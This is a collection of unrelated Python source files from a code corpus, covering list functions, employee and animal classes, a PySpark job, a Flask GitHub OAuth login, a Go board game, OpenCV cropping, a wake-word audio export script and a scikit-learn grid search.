2.可迭代的结构\n\nls = [1, 2, 3, 4, 5, 6]\ns = list(filter(lambda item: item % 2 == 0, ls))\nprint(s)\n\n# map() 函数\n# 对迭代对象中的所有元素做指定的操作,返回一个迭代器对象\ns = list(map(lambda item: item*2, ls))\nprint(s)\n\n# sorted(iterable, key=None, reverse=False) 函数\n# 对迭代对象排序操作\n# 参数 1. 迭代对象 2. 函数 3. 
升序False 降序True\nls = [2, \"0\", 1]\ns = sorted(ls, key=int, reverse=False)\nprint(s)\n\n# ls.sort(key=None, reverse=False)\n# 会修改原来的list\nls.sort(key=int, reverse=False)\nprint(ls)\n","sub_path":"基础语法/5-6章/07_高阶函数.py","file_name":"07_高阶函数.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"633369582","text":"#Programa que compara dos numeros, usamos la funciones para lograr este apartado\nprint(\"Programa que compara dos numeros\")\nprint()\nprint(\"Condiciones: \\n Si el primer numero ingresado es mayor que el segundo devuelve el valor 1\"\n \"\\n Si el segundo valor es mas grande que el primero devuelve -1 \"\n \"\\n Si los dos numeros son iguales devuelve 0\")\nprint()\na=0\na=0\ndef relacion(a,b):\n if a>b:\n print(\"1\")\n elif alife_expectancy*0.9):\n numb= random.randint(0,100)\n if numb>10:\n return False\n if(self.age>life_expectancy*0.8):\n numb= random.randint(0,100)\n if numb>20:\n return False\n return True\n\n\n","sub_path":"ZooToLife/animal.py","file_name":"animal.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"533637126","text":"\"\"\"\nAuthor: Rajiv Malhotra\nProgram: HourlyEmployee.py\nDate: 11/08/2020\n\nHourly Employee class definition\n\"\"\"\n\nfrom datetime import date\n\n\nfrom Employee import Employee\n\nclass HourlyEmployee(Employee):\n \"\"\" Hourly Employee Class\"\"\"\n #Contructor\n def __init__(self, lname, fname, address, pnum, start_dt, hourly_pay):\n super().__init__(lname, fname, address, pnum) # calls the base constructor\n self.start_dt = start_dt\n self.hourly_pay = hourly_pay\n\n @property\n def start_dt(self):\n return self._start_dt\n\n @start_dt.setter\n def start_dt(self, value):\n self._start_dt = value\n\n @property\n def hourly_pay(self):\n return self._hourly_pay\n\n @hourly_pay.setter\n def hourly_pay(self, value):\n if not isinstance(value, float):\n raise ValueError\n self._hourly_pay = value\n\n def give_raise(self, new_hourly_pay):\n \"\"\" Function for hourly_pay raise \"\"\"\n if new_hourly_pay <= self.hourly_pay:\n raise ValueError(\"Pay raise cannot be less than current rate\")\n self.hourly_pay = new_hourly_pay\n\n def display(self):\n return Employee.display(self) + \", \" + str(self.start_dt) + \", $\" + str(self.hourly_pay) + \"/hr\"\n\n#Drivers\ntry:\n hourly_employee = HourlyEmployee('Doe', 'John', '', '515-222-2222', date.today(), 10.00)\n print(hourly_employee.display())\n hourly_employee.give_raise(12.00)\n print(hourly_employee.display())\nexcept ValueError as err:\n print(err)\n\ndel hourly_employee\n","sub_path":"HourlyEmployee.py","file_name":"HourlyEmployee.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"352356807","text":"\"\"\"\r\n Download the data file from the above location and make it accessible to Spark.\r\n Source: https://raw.githubusercontent.com/stedy/Machine-Learning-with-R-datasets/master/groceries.csv\r\n Task2: min, max prices and row count\r\n\"\"\"\r\n\r\nfrom pyspark.sql import SparkSession\r\nimport time\r\nimport logging\r\nimport sys\r\nimport os\r\n\r\n\r\ndef spark_init(app_Name):\r\n \"\"\"\r\n Spark session initialization\r\n :return: spark_session\r\n \"\"\"\r\n return SparkSession.builder.appName(app_Name).enableHiveSupport().getOrCreate()\r\n\r\n\r\ndef products_prefix(word):\r\n return \"Product 
:\" + word\r\n\r\n\r\ndef read_transform(spark, path):\r\n \"\"\"\r\n Load file and return rdd\r\n :return:\r\n \"\"\"\r\n rdd = spark.sparkContext.textFile(path)\r\n flat_rdd = rdd.flatMap(lambda rec: rec.split(',')).filter(lambda rec: rec != ' ')\r\n dist_rdd = flat_rdd.distinct().map(lambda rec: products_prefix(rec))\r\n return dist_rdd\r\n\r\n\r\ndef save_txt(rdd):\r\n \"\"\"\r\n Save to desired output\r\n :param rdd:\r\n :return:\r\n \"\"\"\r\n rdd.coalesce(1).saveAsTextFile(\"C:/Users/DSR/PycharmProjects/truata_code_challenge/tmp/task_1\")\r\n os.rename(\"C:/Users/DSR/PycharmProjects/truata_code_challenge/tmp/task_1/part-00000\",\r\n \"C:/Users/DSR/PycharmProjects/truata_code_challenge/out/out_1_2a.txt\")\r\n\r\n\r\nif __name__ == '__main__':\r\n start_time = time.time()\r\n log = logging.getLogger(\"TASK_1_2\")\r\n logging.basicConfig(level=logging.INFO)\r\n\r\n file_path = \"C:/Users/DSR/PycharmProjects/truata_code_challenge/input/groceries.csv\"\r\n # Initiate spark session\r\n log.info(\" TASK_1_2 Program Started\")\r\n try:\r\n spark = spark_init(\"Truta: TASK_1_2\")\r\n\r\n # Read and transform Source data\r\n rdd = read_transform(spark, file_path)\r\n\r\n # Save desired output\r\n save_txt(rdd)\r\n\r\n log.info(\" TASK_1_2 : Files saved successfully\")\r\n\r\n except Exception as e:\r\n log.info(\" Exception: {}\".format(str(e)))\r\n sys.exit(1)\r\n else:\r\n hours, rem = divmod(time.time() - start_time, 3600)\r\n mins, secs = divmod(rem, 60)\r\n log.info(\"*** TASK_1_2 Completed Successfully in : [{:0>2}hrs:{:0>2}mins:{:05.2f}secs ] ***\"\r\n .format(int(hours), int(mins), secs))\r\n sys.exit(0)\r\n","sub_path":"src/task_1_2.py","file_name":"task_1_2.py","file_ext":"py","file_size_in_byte":2277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"624281227","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Feb 5 13:43:28 2018\r\n\r\n@author: User\r\n\"\"\"\r\n\r\ndef drawfn(s, n):\r\n i=n\r\n for i in reversed(range(n+1)):\r\n if i != 0:\r\n# print(i)\r\n print(s*i)\r\n if i ==0:\r\n print('='*10, end = \"\")\r\n for i in range(n+1):\r\n print(s*i)\r\n\r\ndrawfn('*',6)\r\ndrawfn('$',1)","sub_path":"Py exercises/03_04_alternate.py","file_name":"03_04_alternate.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"360204508","text":"###\n#\n# Homework 20.2 - GitHub login\n#\n###\n\nimport json\n\nfrom flask import Flask, render_template, request, redirect, url_for, make_response\nfrom requests_oauthlib import OAuth2Session\nimport os\n\n\napp = Flask(__name__)\n\n\n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\")\n\n\n@app.route(\"/github/login\")\ndef github_login():\n # prepare the GitHub OAuth session\n github = OAuth2Session(os.environ.get(\"GITHUB_CLIENT_ID\"))\n # GitHub authorization URL\n authorization_url, state = github.authorization_url(\"https://github.com/login/oauth/authorize\")\n # redirect user to GitHub for authorization\n response = make_response(redirect(authorization_url))\n # for CSRF purposes\n response.set_cookie(\"oauth_state\", state, httponly=True)\n return response\n\n\n@app.route(\"/github/callback\")\ndef github_callback():\n github = OAuth2Session(os.environ.get(\"GITHUB_CLIENT_ID\"), state=request.cookies.get(\"oauth_state\"))\n token = github.fetch_token(\"https://github.com/login/oauth/access_token\",\n client_secret=os.environ.get(\"GITHUB_CLIENT_SECRET\"),\n 
authorization_response=request.url)\n response = make_response(redirect(url_for('profile'))) # redirect to the profile page\n response.set_cookie(\"oauth_token\", json.dumps(token), httponly=True)\n return response\n\n\n@app.route(\"/profile\")\ndef profile():\n if request.cookies.get(\"oauth_token\"):\n github = OAuth2Session(os.environ.get(\"GITHUB_CLIENT_ID\"), token=json.loads(request.cookies.get(\"oauth_token\")))\n github_profile_data = github.get('https://api.github.com/user').json()\n return render_template(\"profile.html\", github_profile_data=github_profile_data)\n else:\n return render_template(\"index.html\")\n\n\n@app.route(\"/github/logout\")\ndef logout():\n response = make_response(redirect(url_for('index'))) # redirect to the index page\n response.set_cookie(\"oauth_token\", expires=0) # delete the oauth_cookie to logout\n return response\n\n\nif __name__ == '__main__':\n app.run()","sub_path":"les202/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"168454109","text":"import re\r\nfrom itertools import permutations\r\n\r\n\r\n_DICT = dict() # Main dictionary.\r\ndict_search = dict() # Search results.\r\ndict_regex = dict() # Regex results.\r\n\r\nALPHABET = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\r\n\r\n\r\ndef import_dict(table_out, read_file):\r\n \"\"\"\r\n Imports a dictionary file, reads its contents and inserts them in an\r\n organised dict.\r\n\r\n :param table_out: Dict to write to.\r\n :param read_file: Dictionary file to read from.\r\n :return: None.\r\n \"\"\"\r\n for line in read_file:\r\n word = line.strip(\"\\n\").upper()\r\n add_to_dict(word, table_out)\r\n\r\n\r\ndef get_input():\r\n \"\"\"\r\n Prompts user for input.\r\n\r\n Special Cases Return Code\r\n ============= ===========\r\n 1. User wants to 0\r\n quit.\r\n\r\n 2. User has 1\r\n provided None\r\n value.\r\n\r\n 3. User wants to 2\r\n clear the\r\n current\r\n search result\r\n\r\n\r\n :return: Inputted data. Or return code for special cases.\r\n \"\"\"\r\n _input = input(\":~$ \")\r\n\r\n if _input.upper() == \"QUIT\":\r\n return 0\r\n elif _input is None:\r\n return 1\r\n elif _input.upper() == \"CLEAR\":\r\n return 2\r\n else:\r\n return _input\r\n\r\n\r\ndef decider(option):\r\n \"\"\"\r\n Decides whether or not the user wants to perform a regex operation on a\r\n previous search, or if the user wants to conduct a new search. Extracts\r\n input data from command entered.\r\n\r\n Option codes:\r\n -1 = Invalid option\r\n 0 = Regex operation.\r\n 1 = Search operation.\r\n\r\n :param option: User input.\r\n :return: A tuple, 0th element is option code. 1st element is extracted\r\n input data.\r\n \"\"\"\r\n regex_reg_match = re.match(r\"^r\\((.+)\\)\", option)\r\n regex_search_match = re.match(r\"^s\\(([\\w \\(\\)]+)\\)\", option)\r\n bad_case = (regex_reg_match is None and regex_search_match is None) or \\\r\n (regex_reg_match is not None and regex_search_match is not None)\r\n\r\n if bad_case:\r\n return False\r\n elif regex_reg_match is not None:\r\n return 0, regex_reg_match.group(1)\r\n elif regex_search_match is not None:\r\n return 1, regex_search_match.group(1)\r\n\r\n\r\ndef gen_matched_words(pattern, table_in):\r\n \"\"\"\r\n Selects words from table_in that match the regex pattern and appends it to\r\n table_out.\r\n\r\n :param pattern: Regex pattern.\r\n :param table_in: Input table.\r\n :param table_out: Output table.\r\n :return: True if successful filtering. 
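A condensed sketch of the sorted-letter keying this script is built around (see string_to_key below): anagrams share a single key, so the words reachable from a rack of letters come from dict lookups rather than full scans. letter_key here is a hypothetical stand-in for the real helpers:

def letter_key(word):
    # "dog" and "god" both map to "DGO"
    return "".join(sorted(word.upper()))

table = {}
for w in ["dog", "god", "cat"]:
    table.setdefault(letter_key(w), []).append(w.upper())
print(table[letter_key("god")])   # ['DOG', 'GOD']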
Else, false.\r\n \"\"\"\r\n for key in table_in:\r\n for word in table_in[key]:\r\n match = re.match(pattern, word, re.IGNORECASE)\r\n\r\n if match is not None:\r\n yield word\r\n\r\n\r\ndef tuple_switch_string(char_list):\r\n \"\"\"\r\n Converts a tuple of chars to a string and returns this, and vise-versa\r\n (except return a list of chars).\r\n\r\n :param char_list: Iterable of chars.\r\n :return: Alternate form.\r\n \"\"\"\r\n if type(char_list) in (tuple, list):\r\n ret_str = str()\r\n\r\n for char in char_list:\r\n ret_str += char\r\n\r\n return ret_str\r\n elif type(char_list) == str:\r\n return [char for char in char_list]\r\n\r\n\r\ndef add_to_dict(word, table_out):\r\n \"\"\"\r\n Add a single word to their appropriate keyed list in the dictionary\r\n table_out.\r\n\r\n :param word: The word to add.\r\n :param table_out: Dict to add the word to.\r\n :return: None. False if failed.\r\n \"\"\"\r\n key = string_to_key(word)\r\n\r\n if key not in table_out:\r\n table_out.update({key: [word]})\r\n elif key in table_out and word not in table_out[key]:\r\n table_out[key].append(word)\r\n else:\r\n return False\r\n\r\n\r\ndef string_to_key(word):\r\n \"\"\"\r\n Takes in an unordered string of chars and orders them. Returning this key.\r\n\r\n :param word: Unordered string of chars.\r\n :return: Key.\r\n \"\"\"\r\n char_list = tuple_switch_string(word)\r\n char_list.sort()\r\n\r\n return tuple_switch_string(char_list).upper()\r\n\r\n\r\ndef gen_key_permutations(key):\r\n \"\"\"\r\n Generates all the possible combinations with the chars in the given key.\r\n Yields each combination.\r\n\r\n :param key: The string of chars to work with.\r\n :return: None\r\n \"\"\"\r\n for x in range (1, len(key)+1):\r\n for perm in permutations(key, x):\r\n yield tuple_switch_string(perm)\r\n\r\n\r\ndef gen_possible_words(search_key, table_in):\r\n \"\"\"\r\n Finds words which can be made using the chars in the search key. Yields\r\n these words.\r\n\r\n :param search_key: The chars used in ordered format.\r\n :param table_in: The table to look into.\r\n :return: None\r\n \"\"\"\r\n for permute in gen_key_permutations(search_key):\r\n if permute in table_in:\r\n for words in table_in[permute]:\r\n yield words\r\n\r\n\r\ndef gen_insert_wildcard(string):\r\n \"\"\"\r\n Yields all possible combinations of letters by substituting underscores\r\n with all letters of the alphabet. So dog___ first yields dogAAA, then\r\n dogAAB, AAC ... dogZZY, dogZZZ. This uses a simple recursive algorithm\r\n \r\n :param string: The string with the wildcard chars (_).\r\n :return: None.\r\n \"\"\"\r\n wc_count = string.count(\"_\")\r\n\r\n if wc_count == 1:\r\n for letter in ALPHABET:\r\n yield re.sub(\"_\", letter, string)\r\n else:\r\n next_wc_index = string.find(\"_\")\r\n old_string = string[:next_wc_index + 1]\r\n new_string = string[next_wc_index + 1:]\r\n\r\n for letter in ALPHABET:\r\n old_string_modified = re.sub(\"_\", letter, old_string)\r\n yield from gen_insert_wildcard(old_string_modified + new_string)\r\n\r\n\r\ndef print_dict(table_in):\r\n \"\"\"\r\n Prints a given table of words in an appropriate format.\r\n\r\n :param table_in: Input table.\r\n :return: None.\r\n \"\"\"\r\n if len(table_in) == 0:\r\n print(\"The table is empty. 
Try a new search.\")\r\n for key in table_in:\r\n print(\"Possible words using {}: {}\".format(key, table_in[key]))\r\n\r\n# Importing the words from dictionary file.\r\nprint(\"Importing dictionary...\")\r\nfile_r = open(\"Words.txt\", \"r\")\r\nimport_dict(_DICT, file_r)\r\nfile_r.close()\r\n\r\n# Main loop\r\nwhile True:\r\n # Checking input special cases.\r\n user_input = get_input()\r\n if user_input == 0:\r\n print(\"Quit.\")\r\n break\r\n elif user_input == 1:\r\n print(\"Nothing was entered. Try again.\")\r\n continue\r\n elif user_input == 2:\r\n dict_search.clear()\r\n print(\"Search results cleared.\")\r\n continue\r\n\r\n # If no special input cases, decide what the user wants to do.\r\n decision = decider(user_input)\r\n if not decision:\r\n print(\"Invalid input.\")\r\n continue\r\n elif decision[0] == 0:\r\n dict_regex.clear()\r\n\r\n if len(dict_search) > 0:\r\n # In the case that a search was done before, perform regex\r\n # on search results.\r\n for word in gen_matched_words(decision[1], dict_search):\r\n add_to_dict(word, dict_regex)\r\n else:\r\n # Else perform on main dictionary.\r\n for word in gen_matched_words(decision[1], _DICT):\r\n add_to_dict(word, dict_regex)\r\n\r\n print_dict(dict_regex)\r\n elif decision[0] == 1:\r\n dict_search.clear()\r\n\r\n if decision[1].count(\"_\") > 0:\r\n # If a search was done with wildcard chars.\r\n for letters in gen_insert_wildcard(decision[1]):\r\n key = string_to_key(letters)\r\n\r\n for word in gen_possible_words(key, _DICT):\r\n add_to_dict(word, dict_search)\r\n else:\r\n key = string_to_key(decision[1])\r\n\r\n for word in gen_possible_words(key, _DICT):\r\n add_to_dict(word, dict_search)\r\n\r\n print_dict(dict_search)\r\n","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":7836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"168336075","text":"from django.template import Context, loader\nfrom events.models import Event\nfrom range.models import ShootingRangeDetail, RSOCalendar\nfrom django.http import HttpResponse\nfrom django.shortcuts import render\nimport json\nimport datetime\nfrom django.core import serializers\n\n\ndef index(request):\n latest_event_list = Event.objects.all().order_by('-event_creation_date')[:10]\n page_content = ShootingRangeDetail.objects.latest('creation_date')\n c = Context({\n 'latest_event_list': latest_event_list,\n 'page_content': page_content,\n })\n return render(request, 'range/index.html', c)\n\ndef home_index(request):\n latest_event_list = Event.objects.all().order_by('-event_creation_date')[:10]\n c = Context({\n 'latest_event_list': latest_event_list,\n })\n return render(request, 'range/range_home.html',c)\n\ndef rso_calendar_data(request):\n rso_calendar_data = RSOCalendar.objects.all()\n\n json_res = []\n\n for record in rso_calendar_data:\n json_obj = dict(\n pk=record.pk, \n rso_person_first=record.rso_person.first_name,\n rso_person_last=record.rso_person.last_name,\n rso_start_date=str(record.rso_start_date), \n rso_end_date=str(record.rso_end_date),\n )\n json_res.append(json_obj)\n\n return HttpResponse(json.dumps(json_res), content_type=\"application/json\")\n\n\n\n\n\n","sub_path":"shfc_site/range/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"583350003","text":"# 唤醒词导出\n\nimport os\nimport csv\nimport re\nimport time\nimport shutil\nimport json\nimport 
openpyxl as px\nfrom pydub import AudioSegment\n\n\ndef mkdir_if_not_exists(filepath):\n if not os.path.exists(filepath):\n os.makedirs(filepath)\n\n\nclass Wav():\n valid_flag = ['4']\n\n def __init__(self, src, dst, wavinfo):\n self.src = src\n self.dst = dst\n self.wavinfo = wavinfo\n\n @property\n def wav_path(self):\n return os.path.join(self.src, self.group, self.name) + '.wav'\n\n @property\n def txt_path(self):\n return self.wav_path.replace('.wav', '.txt')\n\n @property\n def dst_wav_path(self):\n return os.path.join(self.dst, self.group, self.name) + '.wav'\n\n @property\n def dst_txt_path(self):\n return self.dst_wav_path.replace('.wav', '.txt')\n\n @property\n def name(self):\n return self.wavinfo[1]\n\n @property\n def group(self):\n return self.wavinfo[0]\n\n @property\n def taskid(self):\n try:\n return self.name[:6]\n except TypeError as e:\n import pdb;pdb.set_trace()\n\n @property\n def duration(self):\n wav = AudioSegment.from_file(self.wav_path)\n return wav.duration_seconds\n\n @property\n def index(self):\n # 有效返回索引,无效返回空\n if str(self.wavinfo[3]) in self.valid_flag:\n return str(int(self.name[-5:]))\n else:\n return ''\n\n def is_effective(self):\n if 1 <= int(self.name[-5]) <= 10:\n return True\n\n\nclass Group():\n def __init__(self, taskid, group, wavs):\n self.taskid = taskid\n self.group = group\n self.wavs = wavs\n\n @property\n def status(self):\n status = []\n for wav in self.wavs:\n if wav.index:\n status.append('1')\n else:\n status.append('')\n return status\n\n @property\n def duration(self):\n duration = 0.0\n for wav in self.wavs:\n duration += wav.duration\n return duration\n\n @property\n def validnum(self):\n return len([wav for wav in self.wavs if wav.index])\n\n\nclass Export():\n csv_title = ['任务期号', '组号', '有效条数', '总时长'] + [str(i) for i in range(1, 31)]\n\n def __init__(self, src, dst, infopath):\n self.src = src\n self.dst = dst\n self.infopath = infopath\n\n def load_xlsx(self):\n wb = px.load_workbook(self.infopath)\n workbook = {}\n for ws in wb:\n if ws.title != 'text':\n raise TypeError(\"please check your excel title {}\".format(ws.title))\n workbook[ws.title] = []\n for row in ws.rows:\n vals = []\n for cell in row:\n vals.append(cell.value)\n workbook[ws.title].append(vals)\n return workbook\n\n def get_wavs(self):\n return [Wav(self.src, self.dst, row) for row in self.load_xlsx()['text'][1:] if any(row)]\n\n def get_groups(self):\n groups = {}\n for wav in self.get_wavs():\n if wav.group in groups:\n groups[wav.group].wavs.append(wav)\n else:\n groups.update({wav.group: Group(wav.taskid, wav.group, [wav])})\n return groups\n\n def handle(self):\n infos = []\n infos.append(self.csv_title)\n for group in self.get_groups().values():\n # 合格15句抽出来\n if group.validnum > 15:\n for wav in group.wavs:\n if wav.index:\n mkdir_if_not_exists(os.path.dirname(wav.dst_wav_path))\n self.copy(wav.wav_path, wav.dst_wav_path)\n self.update_json(wav.txt_path, wav.dst_txt_path)\n info = [group.taskid, group.group, str(group.validnum), group.duration]\n info.extend(group.status)\n infos.append(info)\n else:\n print(\"此组合格句数少于15句:{}\".format(group.group))\n continue\n\n self.write(infos)\n\n def copy(self, src, dst):\n shutil.copy(src, dst)\n\n def update_json(self, srctxt, dsttxt):\n # 将TXT中的手机型号转换为ios,android\n with open(srctxt, 'r', encoding='utf-8') as f:\n json_data = json.loads(f.read().strip('\\ufeff'))\n iphone_type = json_data.get('userinfo', {}).get('MobileType', '')\n if iphone_type:\n if re.findall('iPhone|iPad', iphone_type):\n 
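                # Any MobileType mentioning iPhone/iPad is normalised to the
                # literal 'ios'; every other non-empty value falls through to the
                # else branch below and becomes 'android'.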
json_data['userinfo']['MobileType'] = 'ios'\n else:\n json_data['userinfo']['MobileType'] = 'android'\n\n with open(dsttxt, 'w', encoding='utf-8') as f:\n f.write(json.dumps(json_data, ensure_ascii=False))\n\n def write(self, infos):\n csv_path = os.path.join(self.dst, 'count_{}.csv'.format(time.strftime('%Y-%m-%d_%H-%M-%S')))\n with open(csv_path, 'w', newline='', encoding='gbk') as f:\n writer = csv.writer(f)\n for row in infos:\n writer.writerow(row)\n\n\nif __name__ == '__main__':\n while True:\n src = input(\"请输入原始音频路径:\")\n dst = input(\"请输入结果数据路径:\")\n infopath = input(\"请输入质检表路径:\")\n exporter = Export(src, dst, infopath)\n exporter.handle()\n flag = input(\"处理成功,按0,退出;按1,开始下一个\")\n if flag == '1':\n continue\n else:\n break\n","sub_path":"wake_words/wake_export.py","file_name":"wake_export.py","file_ext":"py","file_size_in_byte":5550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"360406192","text":"from enum import Enum\nimport enum\nimport numpy as np\nimport string\n\nclass State(enum.IntEnum):\n EMPTY = 0\n BLACK = 1\n WHITE = 2\n WALL = 3\n\nclass Baduk:\n size = 19\n size2 = 21\n current_board = None\n current_color = State.BLACK\n def __init__(self,size=19):\n self.size = size\n self.current_board = Board(size)\n self.size2 = size + 2\n\n def board_print(self):\n for line in range(self.size2):\n start = (self.size2 - line - 1) * self.size2\n end = (self.size2 - line) * self.size2\n print(self.current_board.ToString()[start:end].tostring())\n def board_move(self,x,y):\n rev = self.current_board.Move(x,y,self.current_color)\n if rev == True:\n if self.current_color == State.BLACK :\n self.current_color = State.WHITE\n else :\n self.current_color = State.BLACK\n\nclass Board:\n size = 19\n size2 = 21\n board_state = None\n board_group = None\n board_group_live = None\n board_group_next_group_number = 1\n def __init__(self):\n return\n def __init__(self,size=19):\n self.size = size\n self.size2 = size + 2\n self.board_state = np.zeros((self.size2,self.size2),dtype=np.int32)\n self.board_group = np.zeros((self.size2,self.size2),dtype=np.int32)\n for x in range(self.size2):\n for y in range(self.size2):\n self.board_group[x,y] = 0\n if x == 0 or y == 0 or x == self.size2 - 1 or y == self.size2 - 1 :\n self.board_state[x,y] = State.WALL\n else :\n self.board_state[x,y] = State.EMPTY\n self.board_group_live = {0:0}\n board_group_next_group_number = 1\n def clone(self):\n newone = Board()\n newone.size = self.size\n newone.size2 = self.size2\n newone.board_group_next_group_number = self.board_group_next_group_number\n newone.board_group_live = self.board_group_live.copy()\n np.copy(newone.board_group,self.board_group)\n np.copy(newone.board_state,self.board_state)\n \n return newone\n\n def __del__(self):\n del self.board_state\n del self.board_group\n del self.board_group_live\n\n def Move(self,x,y,color):\n if self.board_state[x,y] != State.EMPTY :\n return False\n else :\n near_empty_number = 0\n near_same_number = 0\n near_diff_number = 0\n dx = (1,-1,0,0)\n dy = (0,0,1,-1)\n for d in range(4):\n nx = x + dx[d]\n ny = y + dy[d]\n ncolor = self.board_state[nx,ny]\n if ncolor == State.EMPTY:\n near_empty_number+=1\n if ncolor == State.BLACK or ncolor == State.WHITE:\n if ncolor == color:\n near_same_number+=1\n else:\n near_diff_number+=1\n if near_same_number == 0 and near_diff_number == 0:\n self.board_state[x,y] = color\n self.board_group[x,y] = self.board_group_next_group_number\n 
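                # A lone stone starts a brand-new group: its liberty count is the
                # number of empty neighbours just tallied, and board_group_live is
                # what a capture check would later decrement toward zero.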
self.board_group_live[self.board_group_next_group_number]= near_empty_number\n self.board_group_next_group_number+=1\n if near_empty_number == 0:\n self.clone().try_move()\n else: #주의에 빈곳이 있어서 무조건 놓을 수 있음\n self.board_state[x,y] = color\n #group을 주위와 맞추기 위해서 검색함\n for d in range(4):\n nx = x + dx[d]\n ny = y + dy[d]\n ncolor = self.board_state[nx,ny]\n if ncolor != State.EMPTY:\n self.board_group_live[ self.board_group[nx,ny]] -=1\n \n if color == ncolor and self.board_group[x,y]==0: #현재 빈곳이라 \n self.board_state[x,y] = color\n self.board_group[x,y] = self.board_group[nx,ny]\n self.board_group_live[self.self.board_group[x,y]]+=near_empty_number\n elif color == ncolor and self.board_group[x,y]!=0:\n gxy = self.board_group[x,y]\n gnxy = self.board_group[nx,ny]\n if gxy != gnxy:\n join_group( gxy , gnxy)\n\n # 일단 주변 그룹넘버로 정하고\n # 더 찾아서 더 있으면 join\n \n return True\n def try_move(self):\n return True\n def join_group(self,ga,gb):\n gmax = max(ga,gb)\n gmin = ga+gb - gmax\n for x in range(size2):\n for y in range(size2):\n if board_group[x,y]==gmax:\n board_group[x,y]=gmin\n self.board_group_live[gmin] += self.board_group_live[gmax]\n \n \n\n \n\n def ToString(self):\n rev = np.chararray((self.size2 ** 2))\n for x in range(self.size2):\n for y in range(self.size2):\n color = self.board_state[x,y]\n if color == State.EMPTY :\n rev[self.size2 * y + x] = '.'\n elif color == State.BLACK :\n rev[self.size2 * y + x] = 'B'\n elif color == State.WHITE:\n rev[self.size2 * y + x] = 'W'\n else :\n rev[self.size2 * y + x] = 'o'\n return rev\n\nclass BadukGame:\n \n def Run(self):\n baduk = Baduk(19)\n while(True):\n command = input(\"Input x,y (q:exit) : \")\n if len(command)<1:\n continue\n if command[0]=='q':\n print(\"End\")\n break\n left,right = command.split(',')\n print(\"left:\",left,\" right:\",right)\n \n x = int(left)\n y = int(right)\n baduk.board_move(x,y)\n baduk.board_print()\n\ndef __main__():\n baduk_game = BadukGame()\n baduk_game.Run()\n\n__main__()","sub_path":"baduk.py","file_name":"baduk.py","file_ext":"py","file_size_in_byte":6154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"47926223","text":"# -*- coding: utf-8 -*-\n\"\"\"\nFrom:\nhttps://stackoverflow.com/questions/44383209/how-to-detect-edge-and-crop-an-image-in-python\n\n1. Convert to grayscale\n2. Threshold the image to only get the signature and nothing else\n3. Find where those pixels are that show up in the thresholded image\n4. Crop around that region in the original grayscale\n5. 
Create a new thresholded image from the crop that isn't as strict for display\n\"\"\"\n\nimport cv2\nimport numpy as np\n\n# load image\nimg = cv2.imread('/home/antz/0_CV3/z-Test/crop/crop2/image.jpg') \nrsz_img = cv2.resize(img, None, fx=0.25, fy=0.25) # resize since image is huge\ngray = cv2.cvtColor(rsz_img, cv2.COLOR_BGR2GRAY) # convert to grayscale\n\n# threshold to get just the signature\nretval, thresh_gray = cv2.threshold(gray, thresh=100, maxval=255, type=cv2.THRESH_BINARY)\n\n# find where the signature is and make a cropped region\npoints = np.argwhere(thresh_gray==0) # find where the black pixels are\npoints = np.fliplr(points) # store them in x,y coordinates instead of row,col indices\nx, y, w, h = cv2.boundingRect(points) # create a rectangle around those points\nx, y, w, h = x-10, y-10, w+20, h+20 # make the box a little bigger\ncrop = gray[y:y+h, x:x+w] # create a cropped region of the gray image\n\n# get the thresholded crop\nretval, thresh_crop = cv2.threshold(crop, thresh=200, maxval=255, type=cv2.THRESH_BINARY)\n\n# save image\ncv2.imwrite('output.png',thresh_crop)\n\n# display\ncv2.imshow(\"Cropped and thresholded image\", thresh_crop) \ncv2.waitKey(0)\n","sub_path":"0_Mixed/crop/crop2/crop.py","file_name":"crop.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"30545576","text":"#自动调参\r\nimport numpy as np\r\nfrom sklearn.kernel_ridge import KernelRidge\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.model_selection import GridSearchCV#自动调参矩阵\r\n\r\n#给随机数添加种子,让每次随机的结果都一致。\r\nrng = np.random.RandomState(0)\r\nx = 5 * rng.rand(100, 1)\r\ny = np.sin(x).ravel()\r\nprint(y)\r\n# 添加噪声\r\ny[::5] += 3 * (0.5 - rng.rand(x.shape[0] // 5))\r\n#创建模型\r\n# kr = KernelRidge(kernel=\"rbf\",gamma=0.1)\r\nkr = GridSearchCV(KernelRidge(),\r\n param_grid={\"kernel\": [\"rbf\", \"laplacian\", \"polynomial\",\"sigmoid\"],\r\n \"alpha\": [1e0, 0.1, 1e-2, 1e-3],\r\n \"gamma\": np.logspace(-2, 2, 20)})\r\n#模型拟合\r\nkr.fit(x,y)\r\n#创建测试数据\r\nX_plot = np.linspace(0, 5, 100)\r\n#自动调参的结果(效果最好的参数)\r\nprint(kr.best_score_, kr.best_params_)\r\n# y_kr = kr.predict(X_plot[:, None])\r\n# plt.scatter(x, y)#数据可视化\r\n# plt.plot(X_plot, y_kr, color=\"red\")#模型可视化\r\n# plt.show()\r\n# print(\"========================\")\r\n# print(y[::5])","sub_path":"08 